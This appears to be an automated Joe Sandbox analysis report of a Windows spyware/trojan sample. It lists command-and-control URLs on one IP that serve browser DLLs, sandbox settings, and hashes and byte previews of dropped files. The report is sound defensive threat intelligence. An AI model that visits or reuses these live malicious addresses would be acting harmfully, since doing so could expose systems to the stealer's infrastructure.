http://23.88.106.134/566d6e1ec8db6394/freebl3.dllYW | 100% | Avira URL Cloud | malware |
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | Avira URL Cloud | safe |
http://23.88.106.134/566d6e1ec8db6394/softokn3.dll | 12% | Virustotal | | Browse
http://23.88.106.134/6a9f8e2503d99c04.php) | 100% | Avira URL Cloud | malware |
http://23.88.106.134/6a9f8e2503d99c04.phpcS | 100% | Avira URL Cloud | malware |
http://23.88.106.134/566d6e1ec8db6394/freebl3.dlleV | 100% | Avira URL Cloud | malware |
http://23.88.106.134/566d6e1ec8db6394/freebl3.dll | 100% | Avira URL Cloud | malware |
http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll3x | 100% | Avira URL Cloud | malware |
http://23.88.106.134/6a9f8e2503d99c04.phpition: | 12% | Virustotal | | Browse
http://23.88.106.134 | 100% | Avira URL Cloud | malware |
http://23.88.106.134/566d6e1ec8db6394/nss3.dll | 100% | Avira URL Cloud | malware |
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | Virustotal | | Browse
http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll4 | 100% | Avira URL Cloud | malware |
https://support.mozilla.org | 0% | Avira URL Cloud | safe |
http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll | 100% | Avira URL Cloud | malware |
http://23.88.106.134/6a9f8e2503d99c04.php6 | 100% | Avira URL Cloud | malware |
                        No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://23.88.106.134/6a9f8e2503d99c04.php | true | 13%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll | true | 13%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll | true | 12%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://23.88.106.134/566d6e1ec8db6394/softokn3.dll | true | 12%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://23.88.106.134/566d6e1ec8db6394/mozglue.dll | true | 12%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://23.88.106.134/566d6e1ec8db6394/freebl3.dll | true | Avira URL Cloud: malware | unknown
http://23.88.106.134/566d6e1ec8db6394/nss3.dll | true | Avira URL Cloud: malware | unknown
http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://23.88.106.134/6a9f8e2503d99c04.phpGS | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://23.88.106.134/6a9f8e2503d99c04.phpwser | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://duckduckgo.com/chrome_newtab | aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF | ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr | false | Avira URL Cloud: safe | unknown
http://23.88.106.134/566d6e1ec8db6394/softokn3.dllOV | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://duckduckgo.com/ac/?q= | aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://23.88.106 | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://23.88.106.134/6a9f8e2503d99c04.phpC | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | false | URL Reputation: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | aspnet_regiis.exe, 00000002.00000003.1726461054.0000000022DDD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://23.88.106.134/6a9f8e2503d99c04.php?S | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://23.88.106.134/566d6e1ec8db6394/nss3.dllj9 | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://23.88.106.134/6a9f8e2503d99c04.phpm | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://23.88.106.134/566d6e1ec8db6394/nss3.dllpera | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://23.88.106.134/6a9f8e2503d99c04.phpiSS | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://23.88.106.134/6a9f8e2503d99c04.phppenSSH | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | false | URL Reputation: safe | unknown
http://23.88.106.134/566d6e1ec8db6394/mozglue.dllAV | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://23.88.106.134/6a9f8e2503d99c04.phpz | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe | aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://23.88.106.134/6a9f8e2503d99c04.php513e43049a24c4f8a56ff24fb86a0b | aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe | aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://23.88.106.134/6a9f8e2503d99c04.phpition: | aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | false | 12%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.sqlite.org/copyright.html. | aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824142050.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://23.88.106.134y | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mozilla.com/en-US/blocklist/ | aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://mozilla.org0/ | freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://23.88.106.134/6a9f8e2503d99c04.phpdus.wallet | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | aspnet_regiis.exe, 00000002.00000003.1726461054.0000000022DDD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://23.88.106.134/566d6e1ec8db6394/freebl3.dllYW | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://23.88.106.134/6a9f8e2503d99c04.php) | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ac.ecosia.org/autocomplete?q= | aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | false | URL Reputation: safe | unknown
http://23.88.106.134/6a9f8e2503d99c04.phpcS | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://23.88.106.134/566d6e1ec8db6394/freebl3.dlleV | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll3x | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://23.88.106.134 | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll4 | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org | ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | false | URL Reputation: safe | unknown
http://23.88.106.134/6a9f8e2503d99c04.php6 | aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
23.88.106.134 | unknown | United States | | 18978 | ENZUINC-US | true
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1454088
                        Start date and time:2024-06-08 20:21:05 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 17s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@4/23@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        No simulations
                        No context
                        No context
                        No context
                        No context
                        No context
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):5242880
                        Entropy (8bit):0.037963276276857943
                        Encrypted:false
                        SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                        MD5:C0FDF21AE11A6D1FA1201D502614B622
                        SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                        SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                        SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):98304
                        Entropy (8bit):0.08235737944063153
                        Encrypted:false
                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):685392
                        Entropy (8bit):6.872871740790978
                        Encrypted:false
                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                        MD5:550686C0EE48C386DFCB40199BD076AC
                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):608080
                        Entropy (8bit):6.833616094889818
                        Encrypted:false
                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):450024
                        Entropy (8bit):6.673992339875127
                        Encrypted:false
                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):2046288
                        Entropy (8bit):6.787733948558952
                        Encrypted:false
                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):257872
                        Entropy (8bit):6.727482641240852
                        Encrypted:false
                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                        MD5:4E52D739C324DB8225BD9AB2695F262F
                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):80880
                        Entropy (8bit):6.920480786566406
                        Encrypted:false
